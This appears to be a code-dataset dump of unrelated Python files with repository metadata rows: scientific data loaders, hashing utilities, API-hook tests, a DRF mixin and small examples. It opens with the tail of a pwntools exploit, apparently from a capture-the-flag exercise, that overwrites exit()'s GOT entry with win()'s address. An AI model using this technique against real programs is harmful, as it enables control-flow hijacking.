        pr = pwn.process(remote_binary)
        elf = pwn.ELF(remote_binary, False)
        print(elf.got)
        # overwrite exit()'s GOT entry with the address of win()
        pr.sendlineafter("Input address\n", str(elf.got["exit"]))
        pr.sendlineafter("Input value?\n", str(elf.sym["win"]))
        rsp = pr.readall(timeout=0.5)
        print(rsp)
    finally:
        if pr is not None:
            pr.close()
segfault()
| 27.421053 | 72 | 0.629559 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.226488 |
f1e15b839857a50eb242db9bce20dc2231b79a03
| 9,518 |
py
|
Python
|
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# *Author: Dezso Ribli*
"""
Util functions for training a CNN on weak lensing maps.
Mostly data loaders and data generators with some
additional functionality.
"""
import numpy as np
# https://github.com/IntelPython/mkl_fft/issues/11
#np.fft.restore_all()
import cv2
import math
import os
def step_decay(epoch, base_lr, epochs_drop, drop=0.1):
"""Helper for step learning rate decay."""
lrate = base_lr
for epoch_drop in epochs_drop:
lrate *= math.pow(drop,math.floor(epoch/epoch_drop))
return lrate
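# Worked example: step_decay(25, base_lr=1e-2, epochs_drop=[10, 20]) applies the
# 0.1 drop floor(25/10)=2 times for the first milestone and floor(25/20)=1 time
# for the second, returning 1e-2 * 0.1**3 = 1e-5.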
def load_training_data(mapsize=512, grfized=False, exclude_fid=False,
dense_grid=False, random_split=False,
from_files=False):
"""Load data for different training scenarios."""
if not grfized and (not dense_grid) and (not random_split):
        # the default data to load
X_train, X_test, y_train, y_test = load_sparse_grid(imsize=mapsize,
from_files=from_files)
elif grfized:
        # equivalent gaussian random field maps
assert not from_files
X_train, X_test, y_train, y_test = load_grf_sparse_grid()
elif dense_grid:
assert not from_files
# data with additional points around a cosmology
X_train, X_test, y_train, y_test = load_dense_grid(imsize=mapsize)
elif random_split:
# random train and test split
X_train, X_test, y_train, y_test = load_randomsplit_grid(
imsize=mapsize, from_files=from_files)
    # always predict new idf, why not, it takes no time
    # anyway we will not use it in the experiments
fn = '../../data/columbia_data_fiducial_new_idf_pix'+str(mapsize)+'.npy'
X_new_idf = np.load(fn)
y_new_idf = np.ones((len(y_test),2))
y_new_idf[:,0], y_new_idf[:,1] = 0.309, 0.816
if exclude_fid: # exclude fiducial cosmo params if asked for
idx = (y_train[:,0] == 0.309) & (y_train[:,1] == 0.816)
X_train, y_train = X_train[~idx], y_train[~idx]
return X_train, X_test, X_new_idf, y_train, y_test, y_new_idf
def load_sparse_grid(d='../../data/sparsegrid/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
"""Loaders for various experiments."""
def load_grf_sparse_grid(d='../../data/grf/', case='a',imsize=512):
X_train = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_dense_grid(d='../../data/densegrid/', imsize = 512):
X_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_randomsplit_grid(d='../../data/randomsplit/sparse_512/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
class DataGenerator():
"""
Data generator.
Generates minibatches of data and labels.
Usage:
    from utils import DataGenerator
g = DataGenerator(data, labels)
"""
def __init__(self, x, y, batch_size=1, shuffle=True, seed=0,
ng=None, smoothing = None, map_size = 512,
y_shape = (2,), augment = False, scale = 60*3.5,
d = None, from_files=False):
"""Initialize data generator."""
self.x, self.y = x, y
self.from_files = from_files
self.d = d
self.batch_size = batch_size
self.x_shape, self.y_shape = (map_size, map_size, 1), y_shape
self.shuffle = shuffle
self.augment = augment
self.seed = seed
self.rng = np.random.RandomState(self.seed)
if not from_files:
            assert x.shape[1] == x.shape[2]  # maps must be square
self.A_pix = (float(scale)/map_size)**2
self.ng = ng
self.smoothing = smoothing
self.scale = float(scale)
self.n_data = len(x)
self.n_steps = len(x)//batch_size + (len(x) % batch_size > 0)
self.i = 0
self.reset_indices_and_reshuffle(force=True)
def reset_indices_and_reshuffle(self, force=False):
"""Reset indices and reshuffle images when needed."""
if self.i == self.n_data or force:
if self.shuffle:
self.index = self.rng.permutation(self.n_data)
else:
self.index = np.arange(self.n_data)
self.i = 0
def next(self):
"""Get next batch of images."""
x = np.zeros((self.batch_size,)+self.x_shape)
y = np.zeros((self.batch_size,)+self.y_shape)
for i in range(self.batch_size):
x[i],y[i] = self.next_one()
return x,y
def next_one(self):
"""Get next 1 image."""
# reset index, reshuffle if necessary
self.reset_indices_and_reshuffle()
# get next x
if not self.from_files: # simply index from array
x = self.x[self.index[self.i]]
else: # load from file
fn = str(self.x[self.index[self.i]]) + '.npy'
x = np.load(os.path.join(self.d, fn))
x = self.process_map(x)
y = self.y[[self.index[self.i]]]
self.i += 1 # increment counter
return x, y
def process_map(self, x_in):
"""Process data."""
x = np.array([x_in],copy=True)
if self.augment: # flip and transpose
x = aug_ims(x, self.rng.rand()>0.5, self.rng.rand()>0.5,
self.rng.rand()>0.5)
if self.ng: # add noise if ng is not None
x = add_shape_noise(x, self.A_pix, self.ng, self.rng)
if self.smoothing: # smooth if smoothing is not None
x[0,:,:,0] = smooth(x[0,:,:,0], self.smoothing, self.scale)
return x
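# Minimal usage sketch (assumes x has shape (n_maps, map_size, map_size, 1) and
# y has shape (n_maps, 2); not part of the original module):
#   gen = DataGenerator(x, y, batch_size=8, ng=30, smoothing=1.0, augment=True)
#   xb, yb = gen.next()   # xb: (8, map_size, map_size, 1), yb: (8, 2)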
def predict_on_generator(model, datagen, augment):
"""Predict on data generator with augmentation."""
datagen.reset_indices_and_reshuffle(force=True)
y_true, y_pred = [],[]
for i in range(datagen.n_data):
xi,yi = datagen.next()
y_true.append(yi)
y_pred_tmp = np.zeros(yi.shape)
if augment:
for ai in [0,1]:
for aj in [0,1]:
for ak in [0,1]:
y_pred_tmp += model.predict_on_batch(
aug_ims(xi,ai,aj,ak))
y_pred.append(y_pred_tmp/8.)
else:
y_pred.append(model.predict_on_batch(xi))
y_true = np.vstack(y_true)
y_pred = np.vstack(y_pred)
return y_true, y_pred
def aug_ims(ims, fliplr=0, flipud=0, T=0):
"""Augment images with flips and transposition."""
ims_aug = np.array(ims, copy=True)
for i in range(len(ims_aug)):
if fliplr: # flip left right
ims_aug[i] = np.fliplr(ims_aug[i])
if flipud: # flip up down
ims_aug[i] = np.flipud(ims_aug[i])
if T: # transpose
ims_aug[i,:,:,0] = ims_aug[i,:,:,0].T
return ims_aug
def add_shape_noise(x, A, ng, rng=None, sige=0.4):
"""Add shape noise"""
sigpix = sige / (2 * A * ng)**0.5 # final pixel noise scatter
# add shape noise to map
if rng: # use given random generator
return x + rng.normal(loc=0, scale=sigpix, size=x.shape)
else: # or just a random noise
return x + np.random.normal(loc=0, scale=sigpix, size=x.shape)
def smooth(x, smoothing_scale_arcmin, map_size_arcmin):
"""Smooth by Gaussian kernel."""
# smoothing kernel width in pixels instead of arcmins
map_size_pix = x.shape[0]
s = (smoothing_scale_arcmin * map_size_pix) / map_size_arcmin
# cut off at: 6 sigma + 1 pixel
    # for large smoothing area and odd pixel number
cutoff = 6 * int(s+1) + 1
return cv2.GaussianBlur(x, ksize=(cutoff, cutoff), sigmaX=s, sigmaY=s)
| 37.179688 | 87 | 0.604434 | 3,064 | 0.321916 | 0 | 0 | 0 | 0 | 0 | 0 | 2,544 | 0.267283 |
f1e232b6730dde2945dc690b0f6fddabcc0f6b8b
| 4,683 |
py
|
Python
|
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
bert/utils/common.py
|
rschoon/bert
|
5aeb394dd7c1fcf5995d2f7cd6a25ef3ac81ce13
|
[
"MIT"
] | null | null | null |
import hashlib
import io
import json
import os
import re
import struct
def decode_bin(s, encoding=None):
if encoding is None:
encoding = "utf-8"
if encoding in ("bin", "binary", "bytes", "raw"):
return s
return s.decode(encoding)
class open_output(object):
def __init__(self, filename, mode="wb"):
self._dirname = os.path.dirname(filename)
self.filename = str(filename)
self._tmpname = self.filename+".tmp"
self.mode = mode
self._fileobj = None
def __enter__(self):
if self._dirname:
os.makedirs(self._dirname, exist_ok=True)
self._fileobj = open(self._tmpname, self.mode)
return self._fileobj
def __exit__(self, type, value, tb):
self.close(value is None)
def close(self, commit=True):
if self._fileobj is not None:
self._fileobj.close()
if commit:
os.rename(self._tmpname, self.filename)
else:
os.unlink(self._tmpname)
self._fileobj = None
def expect_file_mode(mode, _sub_mode_re=re.compile('^(u|g|o)=([rwx]+)$')):
if mode is None or mode == "":
return None
if isinstance(mode, int):
return mode
modes = mode.split(",")
rv = 0
for sm in modes:
m = _sub_mode_re.match(sm)
if not m:
            raise ValueError('Invalid mode value %s in %s' % (sm, mode))
shift = ("o", "g", "u").index(m.group(1))*3
bits = 0
for bi in m.group(2):
bits |= 2**('x', 'w', 'r').index(bi)
rv |= (bits << shift)
return rv
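# Worked examples: expect_file_mode("u=rw,g=r") == 0o640 and
# expect_file_mode("u=rwx,g=rx,o=rx") == 0o755.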
def json_hash(name, value):
h = hashlib.new(name)
h.update(json.dumps(value, sort_keys=True).encode('utf-8'))
return h.hexdigest()
def _file_hash(name, filename, chunk_size=2**16):
h = hashlib.new(name)
sz = 0
with open(filename, "rb") as f:
while True:
            chunk = f.read(chunk_size)
if not chunk:
break
sz += len(chunk)
h.update(chunk)
return h, sz
def file_hash(name, filename):
filename = os.fspath(filename)
if os.path.isfile(filename):
h, _ = _file_hash(name, filename)
return h.hexdigest()
h = hashlib.new(name)
dirs = [filename]
while dirs:
dirs = sorted(dirs)
dirname = dirs.pop()
for n in os.listdir(dirname):
fn = os.path.join(dirname, n)
if os.path.isdir(fn):
dirs.append(fn)
else:
fn_u8 = fn.encode('utf-8')
h.update(struct.pack('L', len(fn_u8)))
h.update(fn_u8)
hf, sf = _file_hash(name, fn)
h.update(struct.pack('Q', sf))
h.update(hf.digest())
return h.hexdigest()
def value_hash(name, value):
h = hashlib.new(name)
if isinstance(value, str):
value = value.encode('utf-8')
h.update(value)
return h.hexdigest()
class IOHashWriter(io.IOBase):
def __init__(self, hash_name, fileobj):
if not fileobj.writable():
raise ValueError("IOHashWriter requires writable fileobj")
self._h = hashlib.new(hash_name)
self._inner = fileobj
def digest(self):
return self._h.digest()
def hexdigest(self):
return self._h.hexdigest()
@property
def closed(self):
return self._inner.closed
def close(self):
pass
def fileno(self):
return self._inner.fileno()
    def seek(self, offset, whence=io.SEEK_SET):
        raise OSError("Not seekable")
def seekable(self):
return False
def tell(self):
return self._inner.tell()
def readable(self):
return False
def truncate(self, size=None):
raise OSError("Not truncatable")
def writable(self):
return self._inner.writable()
def write(self, b):
self._h.update(b)
return self._inner.write(b)
class TeeBytesWriter(io.RawIOBase):
def __init__(self, *fileobjs):
self.fileobjs = fileobjs
self.offset = 0
def readable(self):
return False
def tell(self):
return self.offset
def write(self, b):
self.offset += len(b)
for f in self.fileobjs:
f.write(b)
class IOFromIterable(io.RawIOBase):
def __init__(self, iterable):
self._iter = iter(iterable)
self._pos = 0
def readinto(self, buf):
try:
chunk = next(self._iter)
except StopIteration:
return 0
sz = len(chunk)
buf[:sz] = chunk
self._pos += sz
return sz
def tell(self):
return self._pos
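# Usage sketch (illustrative chunks): wrap an iterable of byte chunks as a readable stream.
#   stream = IOFromIterable([b"abc", b"de"])
#   buf = bytearray(3)
#   stream.readinto(buf)   # returns 3, buf now holds b"abc"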
| 23.771574 | 74 | 0.558189 | 2,494 | 0.532565 | 0 | 0 | 65 | 0.01388 | 0 | 0 | 216 | 0.046124 |
f1e2aa05c0131a4119034421ecbeb1cb9810d8c8
| 2,080 |
py
|
Python
|
boaphys/elements.py
|
janpipek/boaphys
|
f32d972e22ebede2f24bf69506125b7c59a4c8c0
|
[
"MIT"
] | null | null | null |
boaphys/elements.py
|
janpipek/boaphys
|
f32d972e22ebede2f24bf69506125b7c59a4c8c0
|
[
"MIT"
] | null | null | null |
boaphys/elements.py
|
janpipek/boaphys
|
f32d972e22ebede2f24bf69506125b7c59a4c8c0
|
[
"MIT"
] | null | null | null |
class Element:
def __init__(self, name : str, symbol : str, Z : int):
self.name = name
self.symbol = symbol
self.Z = Z
def __repr__(self):
return "Element(\"{0}\", Z={1})".format(self.name, self.Z)
def __str__(self):
return self.symbol
class _Table:
def __init__(self):
self._data = [
Element("Hydrogen", "H", 1),
Element("Helium", "He", 2),
Element("Lithium", "Li", 3),
Element("Beryllium", "Be", 4)
]
for element in self._data:
setattr(self, element.symbol, element)
setattr(self, element.name, element)
def __getitem__(self, x):
if isinstance(x, int):
return next((element for element in self._data if element.Z == x), None)
elif isinstance(x, str):
if len(x) <= 2:
return next((element for element in self._data if element.symbol == x), None)
else:
return next((element for element in self._data if element.name == x), None)
else:
raise IndexError()
def __iter__(self):
return iter(self._data)
table = _Table()
class Isotope:
def __init__(self, element, A : int):
self.element = as_element(element)
self.A = A
def __getattr__(self, name):
return getattr(self.element, name)
def __str__(self):
return "{0}-{1}".format(self.element.symbol, self.A)
@property
def Z(self) -> int:
return self.element.Z
@property
def N(self) -> int:
"""Number of neutrons."""
return self.A - self.Z
def as_element(a):
if isinstance(a, Element):
return a
else:
return table[a]
def as_isotope(a):
if isinstance(a, Isotope):
return a
if isinstance(a, (tuple, list)):
return Isotope(*a)
if isinstance(a, str):
raise NotImplementedError()
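# Usage sketch (only H, He, Li and Be are defined in the table above):
#   assert table["He"].Z == 2 and table[3].symbol == "Li"
#   he4 = as_isotope(("He", 4))
#   assert he4.N == 2 and str(he4) == "He-4"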
| 27.012987 | 93 | 0.516827 | 1,693 | 0.813942 | 0 | 0 | 161 | 0.077404 | 0 | 0 | 112 | 0.053846 |
f1e338fa1474985107d12ea6bcd66b88abed94fc
| 2,924 |
py
|
Python
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 100 |
2021-10-04T09:32:04.000Z
|
2022-03-30T11:23:53.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 208 |
2021-10-04T16:56:40.000Z
|
2022-03-31T10:41:44.000Z
|
projects/vdk-plugins/airflow-provider-vdk/tests/hooks/test_vdkhook.py
|
vmware/versatile-data-kit
|
c4e10324a4f3203c58079cb18203880f68053f15
|
[
"Apache-2.0"
] | 14 |
2021-10-11T14:15:13.000Z
|
2022-03-11T13:39:17.000Z
|
# Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import logging
import unittest
from unittest import mock
from vdk.plugin.control_api_auth.authentication import Authentication
from vdk_provider.hooks.vdk import VDKHook
log = logging.getLogger(__name__)
# Monkey-patch the authentication logic to allow for more granular testing
# of the VDKHook
class PatchedAuth(Authentication):
def read_access_token(self) -> str:
return "test1token"
class TestVDKHook(unittest.TestCase):
@mock.patch.dict(
"os.environ", AIRFLOW_CONN_CONN_VDK="http://https%3A%2F%2Fwww.vdk-endpoint.org"
)
def setUp(self):
self.hook = VDKHook(
conn_id="conn_vdk",
job_name="test_job",
team_name="test_team",
auth=PatchedAuth(),
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.call_api")
def test_start_job_execution(self, mock_call_api):
mock_call_api.return_value = (None, None, {"Location": "job-execution-id-01"})
self.hook.start_job_execution()
assert (
mock_call_api.call_args_list[0][0][0]
== "/data-jobs/for-team/{team_name}/jobs/{job_name}/deployments/{deployment_id}/executions"
and mock_call_api.call_args_list[0][0][1] == "POST"
and mock_call_api.call_args_list[0][0][2]
== {
"team_name": "test_team",
"job_name": "test_job",
"deployment_id": "production",
}
)
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_cancel_job_execution(self, mocked_api_client_request):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.cancel_job_execution("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("DELETE", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_status(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id"
self.hook.get_job_execution_status("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
@mock.patch("taurus_datajob_api.api_client.ApiClient.deserialize")
@mock.patch("taurus_datajob_api.api_client.ApiClient.request")
def test_get_job_execution_log(self, mocked_api_client_request, _):
request_url = "https://www.vdk-endpoint.org/data-jobs/for-team/test_team/jobs/test_job/executions/test_execution_id/logs"
self.hook.get_job_execution_log("test_execution_id")
assert mocked_api_client_request.call_args_list[0][0] == ("GET", request_url)
| 38.986667 | 129 | 0.703146 | 2,552 | 0.872777 | 0 | 0 | 2,384 | 0.815321 | 0 | 0 | 1,137 | 0.388851 |
f1e3adf84f989f48fb009dcc9e422f44d758219c
| 720 |
py
|
Python
|
skater/util/logger.py
|
RPUTHUMA/Skater
|
317460b88065b41eebe6790e9efdbb0595cbe450
|
[
"UPL-1.0"
] | 718 |
2017-05-19T22:49:40.000Z
|
2019-03-27T06:40:54.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 114 |
2017-05-24T16:55:59.000Z
|
2019-03-27T12:48:18.000Z
|
skater/util/logger.py
|
quant1729/Skater
|
b46a4abe3465ddc7b19ffc762ad45d1414b060a6
|
[
"UPL-1.0"
] | 121 |
2017-05-22T17:20:19.000Z
|
2019-03-21T15:06:19.000Z
|
"""Funcs for logging"""
import logging
_CRITICAL = logging.CRITICAL
_ERROR = logging.ERROR
_WARNING = logging.WARNING
_INFO = logging.INFO
_DEBUG = logging.DEBUG
_NOTSET = logging.NOTSET
def build_logger(log_level, logger_name, capture_warning=True):
logger = logging.Logger(logger_name)
# All warnings are logged by default
logging.captureWarnings(capture_warning)
logger.setLevel(log_level)
msg_formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
stream_handler = logging.StreamHandler()
    stream_handler.setFormatter(msg_formatter)
logger.addHandler(stream_handler)
return logger
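# Usage sketch (not part of the original module):
#   logger = build_logger(_INFO, __name__)
#   logger.info("interpretation started")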
| 24 | 63 | 0.740278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.156944 |
f1e59d1d38ade7999a6cd5e7982c060b5e15cc11
| 575 |
py
|
Python
|
algorithms/code/leetcode/lc217_contains_duplicate/lc217_contains_duplicate.py
|
altermarkive/training
|
6a13f5b2f466156ad5db0e25da0e601d2404b4c3
|
[
"MIT"
] | null | null | null |
algorithms/code/leetcode/lc217_contains_duplicate/lc217_contains_duplicate.py
|
altermarkive/training
|
6a13f5b2f466156ad5db0e25da0e601d2404b4c3
|
[
"MIT"
] | 1 |
2022-02-16T11:28:56.000Z
|
2022-02-16T11:28:56.000Z
|
algorithms/code/leetcode/lc217_contains_duplicate/lc217_contains_duplicate.py
|
altermarkive/training
|
6a13f5b2f466156ad5db0e25da0e601d2404b4c3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# https://leetcode.com/problems/contains-duplicate/
import unittest
from typing import List
class Solution:
def containsDuplicate(self, nums: List[int]) -> bool:
seen = set()
for num in nums:
if num in seen:
return True
seen.add(num)
return False
class TestCode(unittest.TestCase):
def test_0_5_7(self):
self.assertFalse(Solution().containsDuplicate([0, 5, 7]))
def test_0_5_7_5_10(self):
self.assertTrue(Solution().containsDuplicate([0, 5, 7, 5, 10]))
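# Allow running this test file directly (an addition; the original snippet relied on
# an external test runner such as pytest or unittest discovery):
if __name__ == '__main__':
    unittest.main()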
| 23 | 71 | 0.626087 | 452 | 0.786087 | 0 | 0 | 0 | 0 | 0 | 0 | 73 | 0.126957 |
f1e6fe5da799ee54688ff5ee8d7c10fc529546e8
| 1,818 |
py
|
Python
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | 1 |
2015-11-08T05:20:39.000Z
|
2015-11-08T05:20:39.000Z
|
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
examples/hsmm-geo.py
|
bikash/pyhsmm
|
94fab0ea66072a639b20163c40db04c18069496c
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
np.seterr(divide='ignore') # these warnings are usually harmless for this code
from matplotlib import pyplot as plt
import copy, os
import pyhsmm
from pyhsmm.util.text import progprint_xrange
###################
# generate data #
###################
T = 1000
obs_dim = 2
N = 4
obs_hypparams = {'mu_0':np.zeros(obs_dim),
'sigma_0':np.eye(obs_dim),
'kappa_0':0.25,
'nu_0':obs_dim+2}
dur_hypparams = {'alpha_0':10*1,
'beta_0':10*100}
true_obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams)
for state in range(N)]
true_dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams)
for state in range(N)]
truemodel = pyhsmm.models.GeoHSMM(
alpha=6.,
init_state_concentration=6.,
obs_distns=true_obs_distns,
dur_distns=true_dur_distns)
data, labels = truemodel.generate(T)
plt.figure()
truemodel.plot()
temp = np.concatenate(((0,),truemodel.states_list[0].durations.cumsum()))
changepoints = list(zip(temp[:-1], temp[1:]))  # materialize so the last entry can be patched below
changepoints[-1] = (changepoints[-1][0],T) # because last duration might be censored
#########################
# posterior inference #
#########################
Nmax = 25
obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]
dur_distns = [pyhsmm.distributions.GeometricDuration(**dur_hypparams) for state in range(Nmax)]
posteriormodel = pyhsmm.models.GeoHSMMPossibleChangepoints(
alpha=6.,
init_state_concentration=6.,
obs_distns=obs_distns,
dur_distns=dur_distns)
posteriormodel.add_data(data,changepoints=changepoints)
for idx in progprint_xrange(50):
posteriormodel.resample_model()
plt.figure()
posteriormodel.plot()
plt.show()
| 25.25 | 95 | 0.669417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 279 | 0.153465 |
f1e7704fa789f92ccdaa67ed757a654c38ed5fda
| 2,644 |
py
|
Python
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 1 |
2020-01-05T07:23:48.000Z
|
2020-01-05T07:23:48.000Z
|
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | null | null | null |
drf_nested/mixins/update_nested_mixin.py
|
promoteinternational/drf-nested
|
0042b9e4c100df4ae43a10684c30348160b39187
|
[
"MIT"
] | 2 |
2019-08-12T07:36:57.000Z
|
2019-11-30T01:40:30.000Z
|
from django.db import transaction
from rest_framework.exceptions import ValidationError
from .base_nested_mixin import BaseNestedMixin
class UpdateNestedMixin(BaseNestedMixin):
@transaction.atomic
def update(self, instance, validated_data):
"""
:param instance:
:param validated_data:
:return:
"""
self._errors = {}
if self._has_nested_fields(validated_data):
validated_data, nested_fields_data = self._get_nested_fields(validated_data, remove_fields=True)
nested_field_types = self.extract_nested_types(nested_fields_data)
# Updating or creating direct relations like ForeignKeys before we create initial instance
for field in nested_field_types["direct_relations"]:
field_name = field.get('name')
field_data = field.get('data')
if isinstance(field_data, dict):
nested_instance = self._update_or_create_direct_relations(field_name, field_data)
validated_data[field.get("original_name")] = nested_instance
elif field_data is None:
validated_data[field.get("original_name")] = field_data
model_instance = super().update(instance, validated_data)
# Updating or creating reversed relations like the models that have the current model as ForeignKeys
# using created initial instance
for field in nested_field_types["reverse_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_reverse_relation(field_name, field_data, model_instance)
# Updating or creating generic relations using created initial instance
for field in nested_field_types["generic_relations"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_generic_relation(field_name, field_data, model_instance)
# Updating or creating many-to-many relations using created initial instance
for field in nested_field_types["many_to_many_fields"]:
field_name = field.get('name')
field_data = field.get('data')
self._update_or_create_many_to_many_field(field_name, field_data, model_instance)
if self._errors:
raise ValidationError(self._errors)
else:
model_instance = super().update(instance, validated_data)
model_instance.refresh_from_db()
return model_instance
| 44.066667 | 112 | 0.655825 | 2,505 | 0.947428 | 0 | 0 | 2,459 | 0.93003 | 0 | 0 | 612 | 0.231467 |
f1e8ea63244e88c3991257407c19f60101c1fe1a
| 27 |
py
|
Python
|
sbpack/version.py
|
jdidion/sbpack
|
84bd7867a0630a826280a702db715377aa879f6a
|
[
"Apache-2.0"
] | 11 |
2020-08-12T09:33:46.000Z
|
2022-02-18T15:27:26.000Z
|
sbpack/version.py
|
jdidion/sbpack
|
84bd7867a0630a826280a702db715377aa879f6a
|
[
"Apache-2.0"
] | 35 |
2020-06-12T16:52:36.000Z
|
2022-03-25T04:29:02.000Z
|
sbpack/version.py
|
jdidion/sbpack
|
84bd7867a0630a826280a702db715377aa879f6a
|
[
"Apache-2.0"
] | 2 |
2021-09-27T16:17:26.000Z
|
2022-01-12T22:18:12.000Z
|
__version__ = "2021.10.07"
| 13.5 | 26 | 0.703704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.444444 |
f1e91dba84a62775f1e1edc376c14039a6a6b66f
| 179 |
py
|
Python
|
forayer/datasets/__init__.py
|
dobraczka/forayer
|
df6783f85fb063f58e8b96acef924f9fd2532227
|
[
"MIT"
] | 5 |
2021-09-06T13:50:44.000Z
|
2022-02-14T09:39:09.000Z
|
forayer/datasets/__init__.py
|
dobraczka/forayer
|
df6783f85fb063f58e8b96acef924f9fd2532227
|
[
"MIT"
] | 5 |
2021-09-07T06:53:41.000Z
|
2022-01-17T09:51:53.000Z
|
forayer/datasets/__init__.py
|
dobraczka/forayer
|
df6783f85fb063f58e8b96acef924f9fd2532227
|
[
"MIT"
] | null | null | null |
"""Make datasets available."""
from forayer.datasets.oaei_kg import OAEIKGDataset
from forayer.datasets.open_ea import OpenEADataset
__all__ = ["OpenEADataset", "OAEIKGDataset"]
| 29.833333 | 50 | 0.804469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.335196 |
f1ed8dbfedb221a10fa60ea9b89b4d29afac3606
| 227 |
py
|
Python
|
challenge/admin.py
|
dpmpolo/anniv
|
27081ca5bc514050c10ecc5e5c0994a4d5a7066f
|
[
"MIT"
] | null | null | null |
challenge/admin.py
|
dpmpolo/anniv
|
27081ca5bc514050c10ecc5e5c0994a4d5a7066f
|
[
"MIT"
] | null | null | null |
challenge/admin.py
|
dpmpolo/anniv
|
27081ca5bc514050c10ecc5e5c0994a4d5a7066f
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from challenge.models import Goal, GoalInstance, SignificantOther
# Register your models here.
admin.site.register(Goal)
admin.site.register(GoalInstance)
admin.site.register(SignificantOther)
| 28.375 | 65 | 0.837004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 28 | 0.123348 |
f1ee53bc0c6e33469f0d38aac5f3576590fc8660
| 14,142 |
py
|
Python
|
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
tomdavsmi/ncl-spa
|
baa714071d18cc388ccc73702d78a53f7096db6e
|
[
"MIT"
] | null | null | null |
allocate.py
|
